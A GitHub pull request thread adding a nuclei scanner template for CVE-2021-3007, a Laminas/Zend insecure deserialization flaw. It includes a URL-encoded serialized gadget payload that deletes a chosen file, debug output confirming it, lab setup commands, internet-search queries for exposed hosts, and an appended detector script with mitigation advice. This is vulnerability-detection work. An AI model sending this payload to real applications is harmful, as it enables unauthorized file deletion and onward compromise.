@thanhhungg97 thanhhungg97 commented Dec 5, 2025

/attempt #14236

PR Information

Template validation

  • Validated with a host running a vulnerable version and/or configuration (True Positive)
  • Validated with a host running a patched version and/or configuration (avoid False Positive)

Additional Details

Vulnerability Summary:
Laminas Project laminas-http before 2.14.2 and Zend Framework 3.0.0 contain an insecure deserialization vulnerability in the __destruct method of Zend\Http\Response\Stream. Exploitation requires an application endpoint that calls unserialize() on attacker-controlled data.

Gadget Chain:

  • Class: Zend\Http\Response\Stream (25 chars)
  • Properties: streamName (protected), stream (protected), cleanup (protected)
  • Impact: Arbitrary file deletion via unlink(), chainable with other gadgets for RCE

Debug Output (True Positive):

[INF] [CVE-2021-3007] Dumped HTTP request for http://localhost:8080

POST / HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded

data=O%3A25%3A%22Zend%5CHttp%5CResponse%5CStream%22%3A3%3A%7Bs%3A13%3A%22%00%2A%00streamName%22%3Bs%3A20%3A%22%2Ftmp%2Fnuclei_test.txt%22%3Bs%3A9%3A%22%00%2A%00stream%22%3BN%3Bs%3A10%3A%22%00%2A%00cleanup%22%3Bb%3A1%3B%7D

[DBG] [CVE-2021-3007] Dumped HTTP response http://localhost:8080

HTTP/1.1 200 OK
Content-Type: application/json
X-Powered-By: Zend Framework

{"status":"success","message":"Object unserialized and will be destroyed","type":"Laminas\\Http\\Response\\Stream"}

[CVE-2021-3007] [http] [critical] http://localhost:8080 ["Laminas\\\\Http\\\\Response\\\\Stream"]

Vulnerable Environment:
Docker environment included in CVE-2021-3007-docker/ folder for validation:

  • PHP 8.0 + Apache
  • laminas-http 2.14.1 (vulnerable version)
  • Simple PHP app with unserialize endpoint

cd http/cves/2021/CVE-2021-3007-docker
docker-compose up -d
nuclei -t ../CVE-2021-3007.yaml -u http://localhost:8080 -debug

Shodan Query: http.component:"Zend Framework"
Fofa Query: app="Zend-Framework"

Notes

This CVE is a library-level vulnerability that requires:

  1. Application using vulnerable laminas-http (<2.14.2) or Zend Framework 3.0.0
  2. An endpoint that calls unserialize() on user-controlled input

The template demonstrates successful deserialization of the Zend\Http\Response\Stream gadget class, confirming the vulnerability exists. The gadget chain enables arbitrary file deletion and can be combined with other gadgets for RCE depending on available classes in the application.

This vulnerability was actively exploited in the wild by the FreakOut botnet (January 2021).
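As a defensive illustration added here (it is not part of the PR or of the nuclei-templates project), the following Python scans a form-encoded request body for PHP serialized object headers and flags the gadget class the PR names. Its sample input is the POST body dumped in the debug output above; the `KNOWN_GADGETS` set and the three severity levels are assumptions chosen for the example, not project conventions.

```python
"""Detect PHP serialized objects in URL-encoded request bodies.

Added example for the PR discussion above; not nuclei-templates code.
The sample body is the request dumped in the PR description; the gadget
allowlist holds only the two class names the PR mentions (assumption).
"""
import re
from urllib.parse import unquote, unquote_to_bytes

# PHP object header: O:<name length>:"<class name>":<property count>:{
# Nested objects (gadget chains) produce further headers inside the outer
# braces, so finditer() reports every class the payload would instantiate.
OBJ_HEADER = re.compile(rb'O:(\d+):"([^"]*)":(\d+):\{')

# Gadget classes named in the PR (assumption: both spellings rated the same).
KNOWN_GADGETS = {"Zend\\Http\\Response\\Stream", "Laminas\\Http\\Response\\Stream"}

# Constructed sample: the POST body from the PR's debug output, verbatim.
SAMPLE_BODY = (
    "data=O%3A25%3A%22Zend%5CHttp%5CResponse%5CStream%22%3A3%3A%7B"
    "s%3A13%3A%22%00%2A%00streamName%22%3Bs%3A20%3A%22%2Ftmp%2Fnuclei_test.txt%22%3B"
    "s%3A9%3A%22%00%2A%00stream%22%3BN%3B"
    "s%3A10%3A%22%00%2A%00cleanup%22%3Bb%3A1%3B%7D"
)


def extract_php_objects(blob: bytes) -> list[str]:
    """Return the class name of every serialized PHP object header in blob.

    The declared length must equal the class name's byte length; a mismatch
    is not a valid PHP object header and is ignored rather than reported.
    """
    classes = []
    for m in OBJ_HEADER.finditer(blob):
        declared_len, name = int(m.group(1)), m.group(2)
        if len(name) == declared_len:
            classes.append(name.decode("latin-1"))
    return classes


def scan_form_body(body: str) -> dict[str, list[str]]:
    """Map each form field carrying a serialized PHP object to its classes.

    Values are percent-decoded to bytes (not str) so the NUL bytes that frame
    protected property names (\\0*\\0name) survive intact.
    """
    findings = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, raw_value = pair.partition("=")
        value = unquote_to_bytes(raw_value.replace("+", " "))
        classes = extract_php_objects(value)
        if classes:
            findings[unquote(key)] = classes
    return findings


def rate(findings: dict[str, list[str]]) -> str:
    """Severity for one request: 'critical' if a known gadget class appears,
    'suspicious' if any object would be deserialized from user input,
    otherwise 'clean'."""
    classes = {c for cs in findings.values() for c in cs}
    if classes & KNOWN_GADGETS:
        return "critical"
    if classes:
        return "suspicious"
    return "clean"


if __name__ == "__main__":
    found = scan_form_body(SAMPLE_BODY)
    print(found, rate(found))
```

The detector is a traffic-side complement, not a fix: on the PHP side the application should not pass user input to `unserialize()` at all, or at minimum should call `unserialize($data, ['allowed_classes' => false])` (available since PHP 7.0) so that no object of any class, gadget or otherwise, is ever instantiated from the request.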

@thanhhungg97
Author

/attempt #14236

@thanhhungg97 thanhhungg97 changed the title from "Added CVE-2021-3007 - Laminas/Zend Framework Insecure Deserialization" to "AddCVE-2021-3007 - Laminas/Zend Framework Insecure Deserialization" Dec 5, 2025
@pussycat0x pussycat0x added the Status: In Progress This issue is being worked on, and has someone assigned. label Dec 7, 2025
@DhiyaneshGeek
Member

Hi @thanhhungg97

Thanks for participating in the Bounty Claim, we are going ahead with this PR #14241, since it met all the requirements of the program.

Due to the following reason we are closing this PR
